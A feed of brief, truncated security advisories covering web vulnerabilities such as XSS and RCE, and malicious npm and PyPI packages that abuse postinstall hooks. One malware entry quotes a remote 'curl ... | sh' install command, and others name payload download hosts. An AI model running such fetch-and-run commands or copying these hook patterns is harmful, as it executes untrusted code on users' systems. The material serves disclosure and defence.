PT-2026-42249
Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicio...
Splunk Cloud Platform and Splunk Enterprise Input Validation Error Vulnerability
Splunk Cloud Platform and Splunk Enterprise are both products of the American company Splunk. Splunk Cloud Platform is a powerful service for data collection, processing, and analysis. Splunk Enterprise is a suite of software for data collection and analysis. There is an input validation...
ROS-20260520-73-0004
A vulnerability in the V8 JavaScript script handler of Google Chrome and Microsoft Edge browsers is related to improper code generation control. Exploitation of the vulnerability could allow an attacker acting remotely to execute arbitrary code using a specially crafted HTML page...
PT-2026-42213
Name of the Vulnerable Software and Affected Versions: Splunk Enterprise versions prior to 10.2.2, 10.0.5, 9.4.11, and 9.3.12; Splunk Cloud Platform versions prior to 10.4.2603.1; Splunk Cloud Platfo...
Linux Distros Unpatched Vulnerability : CVE-2026-40016
The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - Attacker can upload a malicious Sieve script over ManageSieve service or locally to bypass configured CPU time limits for Sieve up to 130 times of the configure...
MAL-2026-4693 Malicious code in to-cms (npm)
Source: amazon-inspector (cccb3d12c0df356fc34c0b79a003f32a6484dd9229b43dfef5b89c8dd4dec51c). package.json declares postinstall: node index.js. On npm install, index.js unconditionally HTTPS-GETs https://meet-fr.com/ChromeSetup.exe, writes it ...
MAL-2026-4426 Malicious code in @riteshkumar04/stack-audit (npm)
Source: amazon-inspector (145196e93f9e6006134b35a8d5abfe7fa0de18f2d52b6712d8b2a5ec036526bc). On npm install, scripts/install.js runs curl -sSL https://raw.githubusercontent.com/neutron420/StackAudit/main/scripts/install.sh | sh or the...
MAL-2026-4606 Malicious code in martinez-polygon-clipping-tony (npm)
Source: amazon-inspector (dabf04b2f99e28eb10740bd7459bf64513fac98a064b60071b1e7aabf8674dd0). Package name impersonates the legitimate martinez-polygon-clipping library: README, badges, and API surface are copied verbatim, while repository...
CVE-2026-34463
CVE-2026-34463 affects MantisBT prior to 2.28.2. When cloning an issue from a different project, the clone form (bug_report_page.php) prepends the source project name before the category selector without proper escaping, allowing stored HTML injection (XSS) if an attacker can set the project name...
CVE-2026-34234 CtrlPanel: Unauthenticated RCE using installer script
CtrlPanel is open-source billing software for hosting providers. In versions 1.1.1 and prior, the web-based installer public/installer/index.php is vulnerable to unauthenticated Remote Code Execution (RCE) because it performs the install.lock check only after including and executing form handler...
CVE-2026-45243
Summarize prior to 0.15.1 contains a missing authorization vulnerability in the content script window.postMessage bridge that allows malicious pages to perform unauthorized operations on automation artifacts. Attackers can simulate runtime messages with spoofed sender identifiers to list, read,...
MAL-2026-4453 Malicious code in @tarojs/cli (npm)
Source: amazon-inspector (59b4e6cd0fe6bd16c6fb2bd04e6542a2a3052182d8815a08b124df56f2d9fde2). On npm install, the package's postinstall script performs a reachability GET to https://taro.jd.com/ and, on success, invokes the package's own...
Malicious code in clsx-js (npm)
Source: amazon-inspector (23e4e85f63d161234d84c774fdff696827934a27282be2ce9ff362a756246ee6). On npm install, dist/postinstall.js base64-decodes the URL https://api.npoint.io/984b75c022a70cf00c39, fetches JSON from this anonymous mutable...
EUVD-2026-30967
EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below allow authenticated users to upload SVG attachments through normal attachment-capable fields and later serve those SVG files as top-level inline documents through both the attachment and image entry...
MAL-2026-4441 Malicious code in @shadanai/openclaw (npm)
Source: amazon-inspector (c0e2f02ab1bb3d99de1787ed7d69f1df97bd3b2d7c18cc8ba4e5f8688f649ce9). On npm install, scripts/postinstall.mjs performs several installer-harm actions. 1 Backdoor: writes /.openclaw/openclaw.json configuring a local...
MAL-2026-4174 Malicious code in durabletask (PyPI)
Versions 1.4.1, 1.4.2, and 1.4.3 of durabletask were compromised via a PyPI maintainer account takeover. All three malicious versions were published on 2026-05-19 within a 35-minute window (16:19–16:54 UTC). Pin to =1.4.0. Attack chain - Stage 1 — Import-time dropper: on import, the package fetches a...
Cross-site Scripting (XSS)
Overview: Affected versions of this package are vulnerable to Cross-site Scripting (XSS) via the navigateTo function when handling external redirects in server-side rendering. An attacker can execute arbitrary HTML or JavaScript in the application's origin by supplying a crafted URL containing...
CVE-2026-45303
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.6.5, through the HTML rendering view, scripts can be injected and executed. The frontend provides a function to visualize the HTML content of a current chat. The content is embedded in an...
firefox: thunderbird: URL Bar Spoofing via Manipulated Punycode and Whitespace Characters
A flaw was found in Mozilla. The Mozilla Foundation's Security Advisory describes the following issue: A crafted URL containing Arabic script and whitespace characters could have hidden the true origin of the page, resulting in a potential spoofing attack...
CVE-2026-45314
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, the channel webhook create/update flow accepts arbitrary profileimageurl values, including data:image/svg+xml;base64,... payloads. The profile image endpoint then decodes and serves...